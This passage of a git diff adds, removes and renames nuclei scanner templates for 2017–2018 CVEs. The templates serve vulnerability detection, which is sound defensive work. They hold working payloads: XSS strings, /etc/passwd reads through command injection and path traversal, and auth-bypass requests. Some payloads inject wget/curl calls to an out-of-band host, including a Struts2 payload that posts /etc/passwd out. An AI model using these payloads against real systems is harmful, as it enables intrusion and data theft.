1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. + tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2017/cve-2017-14535.yaml b/nuclei-templates/CVE-2017/cve-2017-14535.yaml deleted file mode 100644 index 8cc11f11f1..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-14535.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability - author: pikpikcu - severity: high - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-14849.yaml b/nuclei-templates/CVE-2017/cve-2017-14849.yaml deleted file mode 100644 index 6a386ab381..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-14849.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2017-14849 - -info: - name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal - author: Random_Robbie - severity: high - description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. - tags: cve,cve2017,nodejs,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2017-14849 - cwe-id: CWE-22 - reference: - - https://twitter.com/nodejs/status/913131152868876288 - - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - - http://www.securityfocus.com/bid/101056 - -requests: - - method: GET - path: - - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/cve-2017-15287.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-15287.yaml rename to nuclei-templates/CVE-2017/cve-2017-15287.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-15647.yaml b/nuclei-templates/CVE-2017/cve-2017-15647.yaml deleted file mode 100644 index 57a6eda186..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-15647.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2017-15647 - -info: - name: FiberHome - Directory Traversal - author: daffainfo - severity: high - description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - tags: cve,cve2017,lfi,router - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-15944.yaml b/nuclei-templates/CVE-2017/cve-2017-15944.yaml deleted file mode 100644 index 48553abee3..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-15944.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2017-15944 - -info: - name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab,milo2012 - description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. - reference: - - https://www.exploit-db.com/exploits/43342 - - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: critical - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2017-15944 - tags: cve,cve2017,rce,vpn,panos,globalprotect - -requests: - - raw: - - | - GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 - Host: {{Hostname}} - Cookie: PHPSESSID={{randstr}}; - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "@start@Success@end@" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-16806.yaml b/nuclei-templates/CVE-2017/cve-2017-16806.yaml new file mode 100644 index 0000000000..e4057dae37 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-16806.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-16806 + +info: + name: Ulterius Server < 1.9.5.0 - Directory Traversal + author: geeknik + reference: https://www.exploit-db.com/exploits/43141 + severity: high + tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." + +requests: + - method: GET + path: + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-17562.yaml b/nuclei-templates/CVE-2017/cve-2017-17562.yaml deleted file mode 100644 index 8f18388518..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-17562.yaml +++ /dev/null @@ -1,106 +0,0 @@ -id: CVE-2017-17562 - -info: - name: Embedthis GoAhead RCE - description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. - author: geeknik - reference: - - https://www.elttam.com/blog/goahead/ - - https://github.com/ivanitlearning/CVE-2017-17562 - - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 - severity: high - tags: cve,cve2017,rce,goahead,fuzz - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2017-17562 - cwe-id: CWE-20 - -requests: - - raw: - - | - GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - payloads: - endpoint: - - admin - - apply - - non-CA-rev - - cgitest - - checkCookie - - check_user - - chn/liveView - - cht/liveView - - cnswebserver - - config - - configure/set_link_neg - - configure/swports_adjust - - eng/liveView - - firmware - - getCheckCode - - get_status - - getmac - - getparam - - guest/Login - - home - - htmlmgr - - index - - index/login - - jscript - - kvm - - liveView - - login - - login.asp - - login/login - - login/login-page - - login_mgr - - luci - - main - - main-cgi - - manage/login - - menu - - mlogin - - netbinary - - nobody/Captcha - - nobody/VerifyCode - - normal_userLogin - - otgw - - page - - rulectl - - service - - set_new_config - - sl_webviewer - - ssi - - status - - sysconf - - systemutil - - t/out - - top - - unauth - - upload - - variable - - wanstatu - - webcm - - webmain - - webproc - - webscr - - webviewLogin - - webviewLogin_m64 - - webviewer - - welcome - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - condition: and - words: - - "environment variable" - - "display library search paths" \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-3506.yaml b/nuclei-templates/CVE-2017/cve-2017-3506.yaml deleted file mode 100644 index b19b9142da..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-3506.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2017-3506 - -info: - name: Oracle Weblogic Remote OS Command Execution - author: pdteam - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - severity: high - tags: cve,cve2017,weblogic,oracle,rce,oast - reference: - - https://hackerone.com/reports/810778 - - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 7.40 - cve-id: CVE-2017-3506 - -requests: - - raw: - - | - POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, - Content-Type: text/xml;charset=UTF-8 - - - - - - - http://{{interactsh-url}} - - - - - - - - - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2017/CVE-2017-3528.yaml b/nuclei-templates/CVE-2017/cve-2017-3528.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-3528.yaml rename to nuclei-templates/CVE-2017/cve-2017-3528.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-5631.yaml b/nuclei-templates/CVE-2017/cve-2017-5631.yaml deleted file mode 100644 index 6dcc26746a..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-5631.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-5631 - -info: - name: CaseAware - Cross Site Scripting - author: edoardottt - severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-5631 - cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware - -requests: - - method: GET - path: - - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'>" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-7529.yaml b/nuclei-templates/CVE-2017/cve-2017-7529.yaml deleted file mode 100644 index b05d81075d..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-7529.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2017-7529 -info: - author: "Harsh Bothra" - name: "Nginx Remote Integer Overflow" - severity: medium - -# This template supports the detection part only. -# Do not test any website without permission -# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Range: bytes=-17208,-9223372036854758792 - Connection: close - - matchers-condition: and - matchers: - - type: status - status: - - 206 - - type: word - words: - - Content-Range - part: all \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-7921.yaml b/nuclei-templates/CVE-2017/cve-2017-7921.yaml deleted file mode 100644 index e9a9330366..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-7921.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2017-7921 -info: - name: Hikvision Authentication Bypass - author: princechaddha - severity: critical - description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. - reference: - - http://www.hikvision.com/us/about_10805.html - - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - tags: cve,cve2017,auth-bypass,hikvision - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 - cve-id: CVE-2017-7921 - cwe-id: CWE-287 - -requests: - - method: GET - path: - - "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - words: - - "application/xml" - part: header diff --git a/nuclei-templates/CVE-2017/cve-2017-9805.yaml b/nuclei-templates/CVE-2017/cve-2017-9805.yaml deleted file mode 100644 index 3fbcb5b5e2..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-9805.yaml +++ /dev/null @@ -1,95 +0,0 @@ -id: CVE-2017-9805 - -info: - name: Apache Struts2 S2-052 RCE - author: pikpikcu - severity: high - description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. - reference: - - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - - https://struts.apache.org/docs/s2-052.html - tags: cve,cve2017,apache,rce,struts - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2017-9805 - cwe-id: CWE-502 - -requests: - - method: POST - path: - - "{{BaseURL}}/struts2-rest-showcase/orders/3" - - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml - body: | - - - - 0 - - - - - - false - 0 - - - - - - wget - --post-file - /etc/passwd - burpcollaborator.net - - false - - - - - java.lang.ProcessBuilder - start - - - asdasd - - asdasd - - - - - - false - 0 - 0 - false - - false - - - - 0 - - - - - - - - - - - matchers-condition: and - matchers: - - - type: word - words: - - "Debugging information" - - "com.thoughtworks.xstream.converters.collections.MapConverter" - condition: and - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml new file mode 100644 index 0000000000..617dcbd20c --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml @@ -0,0 +1,47 @@ +id: cve-2018-0101 +info: + name: Cisco ASA Denial-of-Service # Leads to RCE + author: dwisiswant0 + severity: critical + reference: https://www.exploit-db.com/exploits/43986 + description: | + A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, + remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that + the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. + tags: cve,cve2018,cisco,dos,rce +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 + + + + A + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - type: dsl + dsl: + - "status_code_2 == 500" + - "status_code_2 == 501" + - "status_code_2 == 502" + - "status_code_2 == 503" + - "status_code_2 == 504" + condition: or diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000226.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000226.yaml new file mode 100644 index 0000000000..25ee45947e --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1000226.yaml @@ -0,0 +1,72 @@ +id: CVE-2018-1000226 + +info: + name: Cobbler - Authentication Bypass + author: c-sh0 + severity: critical + description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. + reference: + - https://github.com/cobbler/cobbler/issues/1916 + - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1000226 + cwe-id: CWE-732 + epss-score: 0.01552 + epss-percentile: 0.85717 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve,cve2018,cobbler,auth-bypass + +http: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + _CobblerXMLRPCInterface__make_token + + + + cobbler + + + + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + + - type: word + part: header + words: + - "Content-Type: text/xml" + + - type: word + part: body + words: + - "" + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" + + - type: status + status: + - 200 + +# digest: 490a0046304402206149e09674f1a8fb96dda0761be7e6f5c0cd107611ba73218111b7bd41e49d5d02202e51305f104f3f721b9a2d91f3e104477b7e469116dc1133d00841fdfc3d5aea:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000533.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000533.yaml new file mode 100644 index 0000000000..75553411a0 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1000533.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-1000533 + +info: + name: GitList < 0.6.0 Remote Code Execution + author: pikpikcu + severity: critical + description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution. + reference: + - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533 + - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1000533 + cwe-id: CWE-20 + tags: rce,git,cve,cve2018,gitlist + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /{{path}}/tree/a/search HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + query=--open-files-in-pager=cat%20/etc/passwd + + extractors: + - type: regex + name: path + group: 1 + internal: true + part: body + regex: + - '(.*?)' + + matchers: + - type: word + words: + - "root:/root:/bin/bash" + part: body + +# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/cve-2018-1000600.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000600.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-1000600.yaml rename to nuclei-templates/CVE-2018/CVE-2018-1000600.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml deleted file mode 100644 index 836d88b898..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2018-1000856 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. - reference: - - https://github.com/domainmod/domainmod/issues/80 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-1000856 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /segments/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | - GET /segments/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - cookie-reuse: true - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml deleted file mode 100644 index 58c9a0dac4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2018-1000861 - -info: - name: Jenkins - Remote Command Injection - author: dhiyaneshDK,pikpikcu - severity: critical - description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. - reference: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-1000861 - cwe-id: CWE-502 - epss-score: 0.97348 - tags: kev,vulhub,cve,cve2018,rce,jenkins - metadata: - max-request: 1 - -http: - - method: GET - path: - - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' - - matchers-condition: and - matchers: - - - type: word - words: - - "package#vulntest" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-10095.yaml b/nuclei-templates/CVE-2018/CVE-2018-10095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10095.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml new file mode 100644 index 0000000000..281d1a1d81 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-10230 +info: + name: Zend Server < 9.13 - XSS + author: marcos_iaf + severity: medium + description: | + A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + reference: + - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://www.zend.com/en/products/server/release-notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-10230 + cwe-id: CWE-79 + tags: cve,cve2018,xss,zend +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "is not allowed to open debug sessions" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10562.yaml b/nuclei-templates/CVE-2018/CVE-2018-10562.yaml new file mode 100644 index 0000000000..ad31f74d8b --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10562.yaml @@ -0,0 +1,53 @@ +id: CVE-2018-10562 + +info: + name: Dasan GPON Devices - Remote Code Execution + author: gy741 + severity: critical + description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + reference: + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router + - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-10562 + cwe-id: CWE-78 + epss-score: 0.97572 + cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: dasannetworks + product: gpon_router_firmware + tags: cve,cve2018,dasan,gpon,rce,kev +variables: + useragent: '{{rand_base(6)}}' + +http: + - raw: + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" diff --git a/nuclei-templates/CVE-2018/CVE-2018-10818.yaml b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml new file mode 100644 index 0000000000..af6bee0a00 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-10818 + +info: + name: LG NAS Devices - Remote Code Execution + author: gy741 + severity: critical + description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. + reference: + - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ + - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 + classification: + cve-id: CVE-2018-10818 + tags: cve,cve2018,lg-nas,rce,oast,injection + +requests: + - raw: + - | + POST /system/sharedir.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &uid=10; wget http://{{interactsh-url}} + + - | + POST /en/php/usb_sync.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &act=sync&task_number=1;wget http://{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml deleted file mode 100644 index c79a098cb8..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10823.yaml +++ /dev/null 